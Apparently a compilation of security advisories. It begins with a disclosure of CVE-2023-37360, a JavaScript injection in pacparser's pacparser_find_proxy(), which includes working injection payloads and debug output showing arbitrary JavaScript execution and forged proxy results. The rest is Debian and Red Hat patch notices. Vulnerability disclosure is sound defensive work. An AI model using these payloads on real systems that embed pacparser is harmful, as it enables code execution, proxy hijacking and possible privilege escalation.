pacparser_find_proxy in Pacparser before 1.4.2 allows JavaScript injection, and possibly privilege escalation, when the attacker controls the URL (which may be realistic within enterprise security products).

**Summary**

A JavaScript Injection in pacparser_find_proxy() enables the execution of arbitrary JavaScript code in the context of pacparser's 16 years old version of SpiderMonkey. We are aware of security solutions that integrate pacparser and run as root; this creates a vector for local privilege escalation by chaining this injection with vulnerabilities in SpiderMonkey.

**Details**

When software integrating pacparser wants to evaluate the PAC configuration file to identify the proxy to be used for a given URL and host, they may invoke pacparser_find_proxy(). This function loads the PAC script and interpolates the full URL and the host in it using strcat():

char \* 
pacparser\_find\_proxy(const char \*url, const char \*host)
// \[...\]
char \*sanitized\_url \= str\_replace(url, "'", "%27");
// \[...\]
script \= (char\*) malloc(32 + strlen(sanitized\_url) + strlen(host));
script\[0\] \= '\\0';
strcat(script, "findProxyForURL('");
strcat(script, sanitized\_url);
strcat(script, "', '");
strcat(script, host);
strcat(script, "')");

It is interesting to note that single quotes are URL-encoded to prevent url and host from breaking out of the JavaScript string context. However, it does not take into account backslashes that would escape the single quote concatenated right after sanitized_url. In the absence of a strong validation on the host after its extraction from url, this provides two injection points in the resulting script.

This is what the execution of pactester looks like for a correctly-formatted URL:

    $ PACPARSER_DEBUG=1 ./src/pactester -u 'https://google.com' -p tests/proxy.pac
    DEBUG: Pacparser Initalized.
    DEBUG: Parsed the PAC script.
    DEBUG: Parsed the PAC file: tests/proxy.pac
    DEBUG: Finding proxy for URL: https://google.com and Host: google.com
    DEBUG: Executing JavaScript: typeof(findProxyForURL);
    DEBUG: Executing JavaScript: findProxyForURL('https://google.com', 'google.com')
    secureUrl
    DEBUG: Pacparser destroyed.
    

If a backslash is used at the end of the URL, pactester warns of a SyntaxError exception: that's a sign that characters after the backslash are out of a string context:

$ PACPARSER\_DEBUG\=1 ./src/pactester \-u 'https://foo\\\\' -p tests/proxy.pac
DEBUG: Pacparser Initalized.
DEBUG: Parsed the PAC script.
DEBUG: Parsed the PAC file: tests/proxy.pac
DEBUG: Finding proxy for URL: https://foo\\ and Host: foo\\
DEBUG: Executing JavaScript: typeof(findProxyForURL);
DEBUG: Executing JavaScript: findProxyForURL('https://foo\\', 'foo\\')
JSERROR: NULL:1:
SyntaxError: missing ) after argument list
pacparser.c: pacparser\_find\_proxy: Problem in executing findProxyForURL.
pactester.c: Problem in finding proxy for https://foo\\.
DEBUG: Pacparser destroyed.

To execute arbitrary JavaScript code without any restriction (no single quote, etc), have access to the global scope, and raise an exception to show the result of the operation, we came up with the following payload; replace REPLACEME by the URL-encoded JavaScript you want to execute–make sure to correctly escape special characters in the string depending on your shell first:

http://,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\

    $ PACPARSER_DEBUG=1 ./src/pactester -u 'http://,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\\' -p tests/proxy.pac
    
    DEBUG: Pacparser Initalized.
    DEBUG: Parsed the PAC script.
    DEBUG: Parsed the PAC file: tests/proxy.pac
    DEBUG: Finding proxy for URL: http://,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\ and Host: ,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\
    DEBUG: Executing JavaScript: typeof(findProxyForURL);
    DEBUG: Executing JavaScript:
    findProxyForURL('http://,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\',',(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\')
    JSERROR: NULL:1: ReferenceError: REPLACEME is not defined
    pacparser.c: pacparser_find_proxy: Problem in executing findProxyForURL.
    pactester.c: Problem in finding proxy for http://,(function(t){throw(eval(unescape("REPLACEME")))})(this),0)<!--?\.
    DEBUG: Pacparser destroyed.
    

The same structure can be used to return arbitrary proxy values:

    $ PACPARSER_DEBUG=1 ./src/pactester -u 'http://,"")&&"foo.bar";<!--?\\' -p
    tests/proxy.pac
    DEBUG: Pacparser Initalized.
    DEBUG: Parsed the PAC script.
    DEBUG: Parsed the PAC file: tests/proxy.pac
    DEBUG: Finding proxy for URL: http://,"")&&"foo.bar";<!--?\ and Host:,"")&&"foo.bar";<!--?\
    DEBUG: Executing JavaScript: typeof(findProxyForURL);
    DEBUG: Executing JavaScript: findProxyForURL('http://,"")&&"foo.bar";<!--?\',',"")&&"foo.bar";<!--?\') 
    foo.bar
    

**Impact**

Attackers with control over the URL can execute arbitrary JavaScript code.

The impact would vary greatly depending on its use, but persistent instances of pacparser (e.g. without calls to pacparser_cleanup() between two proxy resolutions) could be forced to return arbitrary values for proxies by overriding the implementation of functions like findProxyForURL().

The JavaScript engine currently used by pacparser is an old and unsupported version of Spidermonkey. Memory corruption vulnerabilities in the engine could allow the execution of native code. We are aware of enterprise security products embedding pacparser and running as root, in which case attackers could elevate their privileges. We are aware of several memory corruption vulnerabilities in this version of the software, but we didn't (yet) leverage them to obtain arbitrary code execution.

CVE-2023-37360: JavaScript Injection in pacparser_find_proxy() (CVE-2023-37360)

An issue was discovered in SiteLinksView.php in Wikibase in MediaWiki through 1.39.3. There is XSS via a crafted badge title attribute. This is also related to lack of escaping in wbTemplate (from resources/wikibase/templates.js) for quotes (which can be in a title attribute).

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2023-37302

Debian Linux Security Advisory 5442-1 - It was discovered that in some conditions the Flask web framework may disclose a session cookie.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5442-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 29, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : flaskCVE ID         : CVE-2023-30861It was discovered that in some conditions the Flask web framework maydisclose a session cookie.For the oldstable distribution (bullseye), this problem has been fixedin version 1.1.2-2+deb11u1.We recommend that you upgrade your flask packages.For the detailed security status of flask please refer toits security tracker page at:https://security-tracker.debian.org/tracker/flaskFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSdym8ACgkQEMKTtsN8TjYRyhAAncBVfFUWx/LOdmid3NG+YIytJnj/ALdxMDnya+Z6DMZtoBzyw9M1wk5PAtlRuP1/BuwACQHUbSahR7eszOLLyLQOGWh6Qaff7784DpJBwZeTiLtSM+Zh+a5j3h19fYfYyCvcPhjKiLXg80jjQcYMWFttOWBZXNyQ8wpuyGRPT23yt2VaFhO7dy6j/zvPuXlLyMBtfDJOSvhZDZi95E7PtsWaQ6UmmEFUGzUW+dcTR/j9Qknfmxop14Iffv2Obvxf467Ms0wYcP0T26rgmc7FP9VqaHlsfra7HzDl7VU1egfiwJVxxQDNiRhxUoAS4LjF5TgXT8tdVKB5/Y5ibdLLydvWNkky0nsgCAimF3vruZB4ncKDCl4TxBaz+08ENLD/NS1A6LlcSriAWq0u/JSe13Xbpq+oxBll26Mu0PaOU9lwqQeNDj3a7GcqQW65OYDhZgP+GjcKkaSoG0mQ9b3Ni3tIQ14KeG8GUwlr8dKPL4qK658Vm5NXbQvMevVGnzrFg0tqCI/MVA6qSugkF8Mxr2XXnI0n4kWS/yKG7grjVBm3+oNJJcuPdzUkaJFY5S1d47tAmH6xQapnMDZCVJ47YdqnJYz1d97S+T+U2clYK2tka1edLfL3kDQ2wH01YsF2WSh/TRzNEFRVl2APdbkSeU3Y1y/nPt9mdb0oZdUmQDU==puZp-----END PGP SIGNATURE-----

Debian Security Advisory 5442-1

Red Hat Security Advisory 2023-3954-01 - This release of Red Hat Fuse 7.12 serves as a replacement for Red Hat Fuse 7.11 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include bypass, code execution, denial of service, information leakage, resource exhaustion, server-side request forgery, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Red Hat Fuse 7.12 release and security update  
Advisory ID:       RHSA-2023:3954-01  
Product:           Red Hat JBoss Fuse  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3954  
Issue date:        2023-06-29  
CVE Names:         CVE-2012-5783 CVE-2020-13956 CVE-2022-4492   
                   CVE-2022-24785 CVE-2022-31692 CVE-2022-36437   
                   CVE-2022-38398 CVE-2022-38648 CVE-2022-40146   
                   CVE-2022-41704 CVE-2022-41854 CVE-2022-41881   
                   CVE-2022-41940 CVE-2022-41946 CVE-2022-41966   
                   CVE-2022-42890 CVE-2022-42920 CVE-2022-45143   
                   CVE-2022-46363 CVE-2022-46364 CVE-2023-1108   
                   CVE-2023-1370 CVE-2023-20860 CVE-2023-20861   
                   CVE-2023-20883 CVE-2023-22602 CVE-2023-33201   
=====================================================================

1. Summary:

A minor version update (from 7.11 to 7.12) is now available for Red Hat  
Fuse. The purpose of this text-only errata is to inform you about the  
security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

This release of Red Hat Fuse 7.12 serves as a replacement for Red Hat Fuse  
7.11 and includes bug fixes and enhancements, which are documented in the  
Release Notes document linked in the References.

Security Fix(es):

* hazelcast: Hazelcast connection caching (CVE-2022-36437)

* spring-security: Authorization rules can be bypassed via forward or  
include dispatcher types in Spring Security (CVE-2022-31692)

* xstream: Denial of Service by injecting recursive collections or maps  
based on element's hash values raising a stack overflow (CVE-2022-41966)

* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)

* Apache CXF: SSRF Vulnerability (CVE-2022-46364)

* Undertow: Infinite loop in SslConduit during close (CVE-2023-1108)

* json-smart: Uncontrolled Resource Consumption vulnerability in json-smart  
(Resource Exhaustion) (CVE-2023-1370)

* springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
(CVE-2023-20860)

* spring-boot: Spring Boot Welcome Page DoS Vulnerability (CVE-2023-20883)

* jakarta-commons-httpclient: missing connection hostname check against  
X.509 certificate name (CVE-2012-5783)

* apache-httpclient: incorrect handling of malformed authority component in  
request URIs (CVE-2020-13956)

* undertow: Server identity in https connection is not checked by the  
undertow client (CVE-2022-4492)

* Moment.js: Path traversal in moment.locale (CVE-2022-24785)

* batik: Server-Side Request Forgery (CVE-2022-38398)

* batik: Server-Side Request Forgery (CVE-2022-38648)

* batik: Server-Side Request Forgery (SSRF) vulnerability (CVE-2022-40146)

* batik: Apache XML Graphics Batik vulnerable to code execution via SVG  
(CVE-2022-41704)

* dev-java/snakeyaml: DoS via stack overflow (CVE-2022-41854)

* codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS  
(CVE-2022-41881)

* engine.io: Specially crafted HTTP request can trigger an uncaught  
exception (CVE-2022-41940)

* postgresql-jdbc: Information leak of prepared statement data due to  
insecure temporary file permissions (CVE-2022-41946)

* batik: Untrusted code execution in Apache XML Graphics Batik  
(CVE-2022-42890)

* Apache CXF: directory listing / code exfiltration (CVE-2022-46363)

* springframework: Spring Expression DoS Vulnerability (CVE-2023-20861)

* shiro: Authentication bypass through a specially crafted HTTP request  
(CVE-2023-22602)

* bouncycastle: potential  blind LDAP injection attack using a self-signed  
certificate (CVE-2023-33201)

* tomcat: JsonErrorReportValve injection (CVE-2022-45143)

For more details about the security issues, including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

873317 - CVE-2012-5783 jakarta-commons-httpclient: missing connection hostname check against X.509 certificate name  
1886587 - CVE-2020-13956 apache-httpclient: incorrect handling of malformed authority component in request URIs  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing  
2144970 - CVE-2022-41940 engine.io: Specially crafted HTTP request can trigger an uncaught exception  
2151988 - CVE-2022-41854 dev-java/snakeyaml: DoS via stack overflow  
2153260 - CVE-2022-4492 undertow: Server identity in https connection is not checked by the undertow client  
2153379 - CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS  
2153399 - CVE-2022-41946 postgresql-jdbc: Information leak of prepared statement data due to insecure temporary file permissions  
2155291 - CVE-2022-40146 batik: Server-Side Request Forgery (SSRF) vulnerability  
2155292 - CVE-2022-38398 batik: Server-Side Request Forgery  
2155295 - CVE-2022-38648 batik: Server-Side Request Forgery  
2155681 - CVE-2022-46363 Apache CXF: directory listing / code exfiltration  
2155682 - CVE-2022-46364 Apache CXF: SSRF Vulnerability  
2158695 - CVE-2022-45143 tomcat: JsonErrorReportValve injection  
2162053 - CVE-2022-36437 hazelcast: Hazelcast connection caching  
2162206 - CVE-2022-31692 spring-security: Authorization rules can be bypassed via forward or include dispatcher types in Spring Security  
2170431 - CVE-2022-41966 xstream: Denial of Service by injecting recursive collections or maps based on element's hash values raising a stack overflow  
2174246 - CVE-2023-1108 Undertow: Infinite loop in SslConduit during close  
2180528 - CVE-2023-20860 springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
2180530 - CVE-2023-20861 springframework: Spring Expression DoS Vulnerability  
2182182 - CVE-2022-41704 batik: Apache XML Graphics Batik vulnerable to code execution via SVG  
2182183 - CVE-2022-42890 batik: Untrusted code execution in Apache XML Graphics Batik  
2182198 - CVE-2023-22602 shiro: Authentication bypass through a specially crafted HTTP request  
2188542 - CVE-2023-1370 json-smart: Uncontrolled Resource Consumption vulnerability in json-smart (Resource Exhaustion)  
2209342 - CVE-2023-20883 spring-boot: Spring Boot Welcome Page DoS Vulnerability  
2215465 - CVE-2023-33201 bouncycastle: potential  blind LDAP injection attack using a self-signed certificate

5. JIRA issues fixed (https://issues.redhat.com/):

ENTESB-20598 - Incomplete fix of CVE-2020-13956  
ENTESB-20598 - Incomplete fix of CVE-2020-13956  
ENTESB-21418 - CVE-2023-1370,  ensure that Syndesis is using fixed json-smart

6. References:

https://access.redhat.com/security/cve/CVE-2012-5783  
https://access.redhat.com/security/cve/CVE-2020-13956  
https://access.redhat.com/security/cve/CVE-2022-4492  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/cve/CVE-2022-31692  
https://access.redhat.com/security/cve/CVE-2022-36437  
https://access.redhat.com/security/cve/CVE-2022-38398  
https://access.redhat.com/security/cve/CVE-2022-38648  
https://access.redhat.com/security/cve/CVE-2022-40146  
https://access.redhat.com/security/cve/CVE-2022-41704  
https://access.redhat.com/security/cve/CVE-2022-41854  
https://access.redhat.com/security/cve/CVE-2022-41881  
https://access.redhat.com/security/cve/CVE-2022-41940  
https://access.redhat.com/security/cve/CVE-2022-41946  
https://access.redhat.com/security/cve/CVE-2022-41966  
https://access.redhat.com/security/cve/CVE-2022-42890  
https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/cve/CVE-2022-45143  
https://access.redhat.com/security/cve/CVE-2022-46363  
https://access.redhat.com/security/cve/CVE-2022-46364  
https://access.redhat.com/security/cve/CVE-2023-1108  
https://access.redhat.com/security/cve/CVE-2023-1370  
https://access.redhat.com/security/cve/CVE-2023-20860  
https://access.redhat.com/security/cve/CVE-2023-20861  
https://access.redhat.com/security/cve/CVE-2023-20883  
https://access.redhat.com/security/cve/CVE-2023-22602  
https://access.redhat.com/security/cve/CVE-2023-33201  
https://access.redhat.com/security/updates/classification/#critical  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.fuse&version=7.12.0  
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.12/

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJ38aNzjgjWX9erEAQinAxAAok8XXaAwrRfOZy4j/osu5ZPTMpagKw0Q  
lf+XZ8a1F38yrVIxk7d48h04HBR865GIqAh5CrN0L9nrxGzkM6Dtiw43KzF3rXbd  
39ozCXv3y1JzRygzUM/RDv10s7kQAqAS9ZU1DWla0ALlcteOfKT98Ao8MAIhgrHg  
Ao+GtGN+jyVsIgfBkI7y6NoFmPG7OaPVg4F85Hq/uuOwg879CKkRIFWLFc8ziVtb  
QoouQ5Zdtb4wnhSqhzJq4pccKeSFXQG+uJV/OIlgMhbdGGkUOtcwX4CW8F584LiH  
ETBbkwnZfUF1FNo3sLRN942z4InkuLnqaX2TdT8wTaQCja1FW/O0Q7IfYTS9ESJ0  
xi06Rn3IeUoJCKIfeKrjI0f1dWqfHy11/TTNgANFbMRjlxJkNAN9nZLD5KdvzOp4  
1WfYTEsvuIaXchH/URDooI9BQ8m38kHogw/a9E/Qq4iXPRQtME7ANHfidCsuTq/9  
uYqOhuaqF82TMEmq2Y3P2D8RT5rnHFjjRbUvKbljzNBX2Co4CJ32zk3L1ol6GHZh  
rvnG1Tco9us8BbVHhSWaTSt3UOjf1eg1U9fhEijA8jR8tSf2Fw7c4e6dqU5kytVp  
ihK2fPpJ1HKqEm3gmPBEIYzSn7UxpjFMN1aZLRa5CZAD4p410Qg1zNX3BVLLI3zp  
vi0V6dxNE2g=  
=yKwR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3954-01

Red Hat Security Advisory 2023-3947-01 - The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Low: open-vm-tools security update  
Advisory ID:       RHSA-2023:3947-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3947  
Issue date:        2023-06-29  
CVE Names:         CVE-2023-20867   
=====================================================================

1. Summary:

An update for open-vm-tools is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, x86_64

3. Description:

The Open Virtual Machine Tools are the open source implementation of the  
VMware Tools. They are a set of guest operating system virtualization  
components that enhance performance and user experience of virtual  
machines.

Security Fix(es):

* open-vm-tools: authentication bypass vulnerability in the vgauth module  
(CVE-2023-20867)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2213087 - CVE-2023-20867 open-vm-tools: authentication bypass vulnerability in the vgauth module

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
open-vm-tools-11.3.5-1.el9_0.2.src.rpm

aarch64:  
open-vm-tools-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-debuginfo-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-debugsource-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-desktop-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-desktop-debuginfo-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-sdmp-debuginfo-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-test-11.3.5-1.el9_0.2.aarch64.rpm  
open-vm-tools-test-debuginfo-11.3.5-1.el9_0.2.aarch64.rpm

x86_64:  
open-vm-tools-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-debuginfo-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-debugsource-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-desktop-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-desktop-debuginfo-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-sdmp-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-sdmp-debuginfo-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-test-11.3.5-1.el9_0.2.x86_64.rpm  
open-vm-tools-test-debuginfo-11.3.5-1.el9_0.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-20867  
https://access.redhat.com/security/updates/classification/#low

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJ2ouNzjgjWX9erEAQghZQ/9Enod3YxV3Ne7U1wqlomGOeq04E/vg5ij  
IrU4FjnXj+w1hAu3BpZp7dTHaDLaiT3st3qQv7CmejEQN3wPnvJn1E/dJ3h7wdLC  
RqO7Q4WGjGJF7ISnX9rA7c1dCETIuqpEnp7IsX4Bcwu5NZ3+rgRuwoA8V1rb4loq  
fuFt+6aKzcRmnVw6rFqeIjhPIVgW3mFrADPnc7dKg+9d7yRR6IWPw82z9irlCeVT  
KROY25Mvo1tw1cYmmd6jyAuDhNMOmy7Q15ra0irW1yFidFpP0h3opDT6X3veqT0G  
8NkaXdiYYTSwqiOrDZbHLa9uOIl/wvl+xTal7YPCb+csPbGO8/K6upzKxTa/xjsm  
uQfJdq8nDE+4pgeGHSxSDgFtjyHDSEEFgWCD48fJSnlc2ejX2cC7sboTUs/ogNAh  
9L3E9wIKB3VKQ4Ij1OkRbasJOz9fgbMdrHabqLsk8nfwRHWKYG9Imr2PpXGZ1oqs  
8Mw10pdBK57da2jYYuDXlV/gdcEwFYamDhgTLEkRPSMUGhOn5dCmo+CMGxu901zr  
PmpOSr5FX8exF3TmslMZ4Dm56hzEy0FDLCallcFKt8Lx/lQbwXqOZOExK4cBa15H  
k12WYkr8kX/gkb+vEb+ppKLfEWpCZ2n4iVoK/taH+3UuzAeU0puReGscko7N3Ctq  
JSi0G604Vn8=  
=IwtM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3947-01

Red Hat Security Advisory 2023-3950-01 - The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Low: open-vm-tools security update  
Advisory ID:       RHSA-2023:3950-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3950  
Issue date:        2023-06-29  
CVE Names:         CVE-2023-20867   
=====================================================================

1. Summary:

An update for open-vm-tools is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - x86_64

3. Description:

The Open Virtual Machine Tools are the open source implementation of the  
VMware Tools. They are a set of guest operating system virtualization  
components that enhance performance and user experience of virtual  
machines.

Security Fix(es):

* open-vm-tools: authentication bypass vulnerability in the vgauth module  
(CVE-2023-20867)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2213087 - CVE-2023-20867 open-vm-tools: authentication bypass vulnerability in the vgauth module

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
open-vm-tools-11.3.5-1.el8_6.2.src.rpm

x86_64:  
open-vm-tools-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-debuginfo-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-debugsource-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-desktop-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-desktop-debuginfo-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-sdmp-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-sdmp-debuginfo-11.3.5-1.el8_6.2.x86_64.rpm  
open-vm-tools-test-debuginfo-11.3.5-1.el8_6.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-20867  
https://access.redhat.com/security/updates/classification/#low

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJ2otNzjgjWX9erEAQj7Fg/+OqllJsOUa9C16ghEetmzCRAt1PP1rzdS  
gj0SyYrTe8YuRY6fI/u810X6x9KQQZPq8HuuK9mgZHJ52NHifkl29TbPDaOzQoq1  
5GKjd7QNcoPYM7bMv+bYfVnirypZ6j9GYjODYxV2tmFOqSXIpDkXLNZTfcytSxGO  
73G6v7ktqcbVZn7JvSLhsPbk4roa6uwSkecKZT5Edah0AAPM8GxvlRMIL1S79KR/  
ahuRSFGB0H7n+/5a8gI6g/fMniv/SbNRboTFzYlvPHWVigoPXdBlR4JcCnYX6Kk/  
ZF0l9oHF5M5aTC62lX5cqMo70WwVNn5Y53KZYsFUGAmjU2n5Lah6OZJzkHNCQQWl  
eBJL4FIwUKbwYf9ULr1OWfrCjMf0CFR/b+5NV6ukjI9hz/iW31fGpj2bPjxjuMmj  
kEEPIMRqGbBg42WgILUFz0FybxhMkTrwL6rq1A9yZ17W0ZU57DwOdHRkKeSh313d  
1oZ5dJf4/AijGwyUByQK8gXmyYjC8aCKHw3GJN3zhrGxnfu78+zJYtr7O1pblBzb  
Jh4E7alyGRPW4aOglT8GZ2zKixGki7/5068GL1usSdSDTYhpFM5xoulbTZFYYcub  
OKaaZxolhTVed8EmHEani/9u6E4Az2Q0LJ/Lkf1JCVoMTnmtdLNmAMxZA9ZxEZUW  
Gj+mJnO4NJI=  
=74uu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3950-01

Debian Linux Security Advisory 5440-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5440-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 28, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-3420 CVE-2023-3421 CVE-2023-3422Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 114.0.5735.198-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 114.0.5735.198-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSceTMACgkQEMKTtsN8TjYsiA/+OWn1Ps1ARDZgEE82rN+QOLoo6/WWVGk+ZafRaHK1s3aoLC250A/kTEBQLtUgk8b8+xlcvB86GfNASakBwfbmZG9q1joXsTDzQsK9l1vsbtFIfiOgS2a1P3mZkFPCux+yLfFvKRwg9ofBphAY5CFgmzPjU4E0OHtDlwfie4CJsJ9PQuWprWZXmIo5W5p5/rpGCEZCK7VWlG6aocoSeScYGsfKl0ue8He990eZg4KuHbxsHzVMvuX+DtACFe2x3WdZKkyxaucHKD4WIawVh87zFAx0+Fnf1IXAkegyowDEy0D17zI4/Nab92JMAd2YLxnonMp+56ESLqU6AD+P16OWpMKpsFg0J20u/BqCcGsP9GtfsYev1MIJBVolm/ph7m4PgkcgwXXy0atGM2D0T9BqLTYEFm3MK2AA2yyUXIRw5QA0VwJk57cguOF+hFJrhwbhTvlKNthpQrrhhh2tRzIO1x+BT6NDMpBFyS2Y0x7+e8E4HdRwr3FTmf26sxfzRKhGHjM4gUwb2yKFLgwIjriZBgY2OC1gPHMod3oFHOKf0Ml/piRQRNXuJFUZCdMaZirdzCWE5BeNJX42wdWLDdpPFTf1TtEJuaX/AD59TOPa3p23mO4cqJTOehZ3u/EPOm3zRCjBT2GPKy911xO9sxoPsff2F1mW/ndQU6/ybeAjLBk==jLPG-----END PGP SIGNATURE-----

Debian Security Advisory 5440-1

